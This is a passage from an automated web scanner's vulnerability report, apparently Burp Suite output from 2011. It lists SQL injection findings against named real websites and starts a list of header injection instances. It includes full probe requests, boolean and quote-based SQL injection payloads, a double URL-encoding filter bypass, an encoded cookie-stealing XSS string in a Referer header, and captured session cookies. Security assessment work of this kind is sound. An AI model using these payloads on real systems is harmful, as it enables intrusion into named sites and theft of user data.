/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
og.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e10:4DB7E2E96462F&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.41/http://clk.atdmt.com/COM/go/305845692/direct;pc.504465/01/2011.04.27.22.04.41\" target=\"_blank\"><img src=\"http://adlog.com.com/adlog/i/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e10:4DB7E2E96462F&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173%2e193%2e214%2e243&dvar=dvar%255fexclude%253dgolf%2523dvar%255finstlang%253den%252dUS%2523dvar%255fsession%253dc%2523dvar%255fsubsession%253d4%2523dvar%255fuser%253danon&ucat_rsi=%2526&pg=TbiQ3wq0GVcAACnZCmE&t=2011.04.27.22.04.41/http://i.i.com.com/cnwk.1d/Ads/2312/10/SWA_0_Redtape_970x66_jpg.jpg\" height=\"66\" width=\"970\" alt=\"Click Here\" border=\"0\" /></a><img src=\"http://view.atdmt.com/COM/view/305845692/direct;pc.504465/01/2011.04.27.22.04.41\" width=\"0\" height=\"0\" border=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" /></center></div></div>"})/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw3.cnet.com::1754036544 2011.04.27.22.04.41 *//* MAC T 0.1.4.5 */;/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad110_100",segmentId:"503380",rotatorId:"18229",creativeSizeId:"79",isBlank:"0",seg_pageState:"",adHTML:"<style type=\"text/css\"> @import \"http://i.i.com.com/cnwk.1d/Ads/common/css/SportsSkyOne/SportsSkyOne.css\";</style>\n<ul class=\"adsSportsSkyOne\">\n <li id=\"item_1_503380\" style=\"display:block;\">\n <a class=\"adsSportsSkyOne_img\" href=\"http://adlog.com.com/adlog/c/r=18229&sg=503380&o=22058%253a22207%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=
...[SNIP]...

1.14. http://tags.bluekai.com/site/3344 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://tags.bluekai.com
Path:	/site/3344

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /site/3344'%20and%201%3d1--%20?ret=js&phint=site%3D175&phint=ncat%3D22072%3A22408%3A&phint=ptype%3D2001&phint=__bk_t%3DTennis%20-%20CBSSports.com%20Scoreboard%2C%20Schedules%2C%20Players&phint=__bk_k%3Dworld%20womens%20wta%20mens%20atp%20tennis%20news%2C%20professional%20wta%20atp%20tennis%20tour%20players%20wimbledon%20french%20open%20u.s.%20open%20australian%20davis%20fed%20cup%20open%20rankings%2C%20CBSSports%20Line&jscb=cbsiPrepBK&data=all&r=52828613 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bklc=4db80c19; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bko=KJhE8VPQ0mqjTzF/A9CAjROjA2QQnsRs9aH4OSy=; bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9p+eQy1SH/keYA1/nsUeCYjo69j91NIWd6=; bk=oQUj+e49Zw3VIHOf; bkc=KJh56v2nxNWRhFcFlKjIKm29LOZVNsRyEcuYRwKv+iki1QQZ0T/QEWH71vi/RkoSWC6TTjoWaFywOJBBn/RPZHqhFO4w5+2qprceK5fpy+ByGjHNtw/K495GsWdcFJSi8TLAfJHQ1InmMwjfpv5Etizh0ddV7DWTpMiLH8pXx77JNjj8bfR8ZiBxMwQtjLkqU8F8PQLVSA6dHUkDwcrQnU7guCotP0WpcwQjMC9Fr+3u+pTlqt7Ejf5ycITEE60inc7gR99KPbeI4Kz7u/uVdbmVFwPnckbFcJbejMQFd+ksV4nVOKw0ZWmhNF47m1oCwddm8reB2naXtw5KHqLSLXhq+6NdUCFmwZ8b77mNJVI51lbbNBfRN8bFSL++744Q5XCHf3SNGdFI9JN3kfA=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bkdc=res

Response 1

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 22:05:34 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Dc5GyAUFTeZVIHOf; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlAlCJF9LztaZAikR3YWR6QoevhCw+GGiPCVOkA6/x/3JHLw9nw0GH+O/211JjiPpCwhYLf/vBHH3JBrnmTUQlNIp0Lmd1yv059dGraxRmchyayBSKrJ9IcjJra3EnmhYKETVI1GauHZcjYM6u1IUjh6kQ+xxLH5ySkVfsFeXLFHzp2VKlmGc5+1JYh1kwYWIq6kEw2FUC5Qwais2MoMpfV+zlsLOAlUPu3OE/R8Fuks5UeVO+eAClKDTSt0OwZ5vDjhdoB6wFL8tdeISHIyzCEcZtNyWXpQn7Ul5m9G79Ne230gB42cII7iAXKt8xEd8KQEektU7+uG2YLHfbGh4YyUfI71AYqlG41NrCNbFu+jio7rlgdPAIzwOIXI2hD8g0fvpt6T76TGj6rujBBp+79EItWZTq6+a8FdHcoXy=; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQ6JrXy8KJxjVUQusqjTzF/61iAJDOjANiQfYRsxYRxxK4; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9hi5A9jCCvsW6YuszxW0QMypMOCjOYl98AYAuksDLVWG3g5QRWCESvW/xDL2+/ORFJEG1A9/X9SfQ==; expires=Mon, 24-Oct-2011 22:05:34 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 28-Apr-2011 22:05:34 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 337
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 15987,
"timestamp": 1303941934,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941934
}
]
},
{
"campaign": 15894,
"timestamp": 1303941934,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941934
}
]
}
]
}
);

Request 2

GET /site/3344'%20and%201%3d2--%20?ret=js&phint=site%3D175&phint=ncat%3D22072%3A22408%3A&phint=ptype%3D2001&phint=__bk_t%3DTennis%20-%20CBSSports.com%20Scoreboard%2C%20Schedules%2C%20Players&phint=__bk_k%3Dworld%20womens%20wta%20mens%20atp%20tennis%20news%2C%20professional%20wta%20atp%20tennis%20tour%20players%20wimbledon%20french%20open%20u.s.%20open%20australian%20davis%20fed%20cup%20open%20rankings%2C%20CBSSports%20Line&jscb=cbsiPrepBK&data=all&r=52828613 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bklc=4db80c19; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bko=KJhE8VPQ0mqjTzF/A9CAjROjA2QQnsRs9aH4OSy=; bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9p+eQy1SH/keYA1/nsUeCYjo69j91NIWd6=; bk=oQUj+e49Zw3VIHOf; bkc=KJh56v2nxNWRhFcFlKjIKm29LOZVNsRyEcuYRwKv+iki1QQZ0T/QEWH71vi/RkoSWC6TTjoWaFywOJBBn/RPZHqhFO4w5+2qprceK5fpy+ByGjHNtw/K495GsWdcFJSi8TLAfJHQ1InmMwjfpv5Etizh0ddV7DWTpMiLH8pXx77JNjj8bfR8ZiBxMwQtjLkqU8F8PQLVSA6dHUkDwcrQnU7guCotP0WpcwQjMC9Fr+3u+pTlqt7Ejf5ycITEE60inc7gR99KPbeI4Kz7u/uVdbmVFwPnckbFcJbejMQFd+ksV4nVOKw0ZWmhNF47m1oCwddm8reB2naXtw5KHqLSLXhq+6NdUCFmwZ8b77mNJVI51lbbNBfRN8bFSL++744Q5XCHf3SNGdFI9JN3kfA=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bkdc=res

Response 2

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 22:05:35 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=OqkFexxreVtVIHOf; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56ENn96WxOrOlAlCJF9LztaZAikSvYWR6QoevhCw+GGiPCVOkA6/x/3JHLw9nw0GH+O/211JjiPpCwhYLf/vBHH3JBrnmTUQlNIp0Lmd1yv059dGraxRmchyayBSKrJ9IcjJra3EnmhYKETVI1GauHZcjYM6u1IUjh6kQ+xxLH5ySkVfsFeXLFHzp2VKlmGc5+1JYh1kwYWIq6kEw2FUC5Qwais2MoMpfV+zlsLOAlUPu3OE/R8Fuks5UeVO+eAClKDTSt0OwZ5vDjhdoB6wFL8tdeISHIyzCEcZtNyWXpQn7Ul5m9G79Ne230gB42cII7iAXKt8xEd8KQEektU7+uG2YLHfbGh4YyUfI71AYqlG41NrCNbFu+jio7rlgdPAIzwOIXI2hD8g0fvpt6T76TGj6rujBBp+79EItWZTq6+a8Fy5to2/=; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQ6JIXy8KjxjVUQusqjTzF/61iAJDOjANiQfYRsxYRCxKC; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhqoLc9yYOPyL9aocQjfrAp1e90zc/5Z1f9zWXq/zwe11zx/zmrM8eCRc96xzQDVQsamWLRFMYYh1n+xKx68QIVe9hi5A9jCCvsW6YuYzxW0QMypMOCjOOcAZss0fQFjsxGHoJCx5cEfLe9AYjHyo9Ya7Fo9nc7v59K9sjNsdW=; expires=Mon, 24-Oct-2011 22:05:35 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Thu, 28-Apr-2011 22:05:35 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 488
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 15895,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 106823,
"timestamp": 1303941935
}
]
},
{
"campaign": 15987,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941935
}
]
},
{
"campaign": 15894,
"timestamp": 1303941935,
"categories": [
{
"categoryID": 79000,
"timestamp": 1303941935
}
]
}
]
}
);

1.15. http://tools.ip2location.com/ib2 [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tools.ip2location.com
Path:	/ib2

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ib2 HTTP/1.1
Host: tools.ip2location.com
Proxy-Connection: keep-alive
Referer: http://www.witopia.net/index.php/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1709
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:14:10 GMT

<html>
<head>
<title>IP2Location Information Box 2</title>
<meta content="IP2Location™ Free Product Demo, Free Webmaster Tools, Sample Databases and Web Services for Programmers, Webmasters a
...[SNIP]...
</html>
ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.1.31-community-log]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like' at line 1

Request 2

GET /ib2 HTTP/1.1
Host: tools.ip2location.com
Proxy-Connection: keep-alive
Referer: http://www.witopia.net/index.php/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1416
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 27 Apr 2011 21:14:12 GMT

<html>
<head>
<title>IP2Location Information Box 2</title>
<meta content="IP2Location™ Free Product Demo, Free Webmaster Tools, Sample Databases and Web Services for Programmers, Webmasters a
...[SNIP]...

1.16. http://www.maxpreps.com/WebResource.axd [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.maxpreps.com
Path:	/WebResource.axd

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=633525117006718750&1%2527=1 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response 1

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Apr 2011 18:50:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 26416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<form name="aspnetForm" method="post" action="utility/errorhandler/invalidinformation.aspx" id="aspnetForm">
...[SNIP]...
d keep the form on the screen
responseElement.innerHTML = result.get_responseData().toString();
_gaq.push(['_trackEvent', 'ErrorPage', 'Fail']);
}
}
}
}
}
}

//Sends the email to the tech support
function sen
...[SNIP]...

Request 2

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=633525117006718750&1%2527%2527=1 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Thu, 24 Jul 2008 22:55:00 GMT
Content-Type: application/x-javascript
Content-Length: 20931
Expires: Thu, 28 Apr 2011 18:50:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:42 GMT
Connection: close

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

1.17. http://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.personalvpn.com
Path:	/index.php

Issue detail

The sid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the sid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php?app=ccp0&ns=viewcart&sid=4345a8cg600y1ar42khfi9pf954r17xh' HTTP/1.1
Host: www.personalvpn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 10:15:23 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=4345a8cg600y1ar42khfi9pf954r17xh%27; expires=Sun, 22-Apr-2012 06:15:23 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Thu, 28 Apr 2011 09:15:23 GMT
Content-Length: 3880
Last-Modified: Thu, 28 Apr 2011 10:15:23 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

1.18. http://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.personalvpn.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /index.php HTTP/1.1
Host: www.personalvpn.com
Proxy-Connection: keep-alive
Referer: http://www.personalvpn.com/index.php?app=ccp0&ns=prodshow&ref=pptp_ssl_pc
Cache-Control: max-age=0
Origin: http://www.personalvpn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 233

prodall%5B%5D=pptp_ssl_pc&ccp0--prodaddtocart--pptp_ssl_pc--referref=pptp_ssl_pc&ccp0--prodaddtocart--pptp_ssl_pc--referns=prodshow&sid=60x0b62eys7w6x6uj2b6m04894n169fn'&app=ccp0&ns=addcart&ccp0--prodaddtocart--pptp_ssl_pc--quantity=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:16:01 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=60x0b62eys7w6x6uj2b6m04894n169fn%27; expires=Sat, 21-Apr-2012 17:16:01 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:16:02 GMT
Content-Length: 3880
Last-Modified: Wed, 27 Apr 2011 21:16:02 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

1.19. https://www.personalvpn.com/index.php [sid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.personalvpn.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /index.php?app=ccp0&ns=checkout&sid=60x0b62eys7w6x6uj2b6m04894n169fn'&portrelay=1 HTTP/1.1
Host: www.personalvpn.com
Connection: keep-alive
Referer: http://www.personalvpn.com/index.php
Cache-Control: max-age=0
Origin: http://www.personalvpn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 17

CHECKOUT=Checkout

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:16:19 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/1.0.0d PHP/5.2.13 with Suhosin-Patch
X-Powered-By: KHXC/6.6.5
Set-Cookie: sid=60x0b62eys7w6x6uj2b6m04894n169fn%27; expires=Sat, 21-Apr-2012 17:16:19 GMT; path=/; domain=.witopia.net
Pragma: no-cache
Cache-Control: must-revalidate
Expires: Wed, 27 Apr 2011 20:16:19 GMT
Content-Length: 3881
Last-Modified: Wed, 27 Apr 2011 21:16:19 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-ty
...[SNIP]...
<p>The PostgreSQL extension encountered
a problem submitting an SQL statement. PostgreSQL reported the error as: ERROR: duplicate key value violates unique constraint "pk_khxc_sessions_id"</
...[SNIP]...

2. HTTP header injection previous next
There are 13 instances of this issue:

http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [XCLGFbrowser parameter]
http://amch.questionmarket.com/adsc/d674921/2/717103/decide.php [name of an arbitrarily supplied request parameter]
http://amch.questionmarket.com/adsc/d884653/4/500005059184/decide.php [ES cookie]
http://amch.questionmarket.com/adscgen/sta.php [code parameter]
http://amch.questionmarket.com/adscgen/sta.php [site parameter]
http://d.xp1.ru4.com/activity [redirect parameter]
http://dw.com.com/clear/c.gif [REST URL parameter 2]
http://dw.com.com/clear/redx/c.gif [REST URL parameter 2]
http://dw.com.com/clear/redx/c.gif [REST URL parameter 3]
http://tacoda.at.atwola.com/rtx/r.js [N cookie]
http://tacoda.at.atwola.com/rtx/r.js [si parameter]
http://widgetserver.com/syndication/get_widget.js [callback parameter]

Issue background

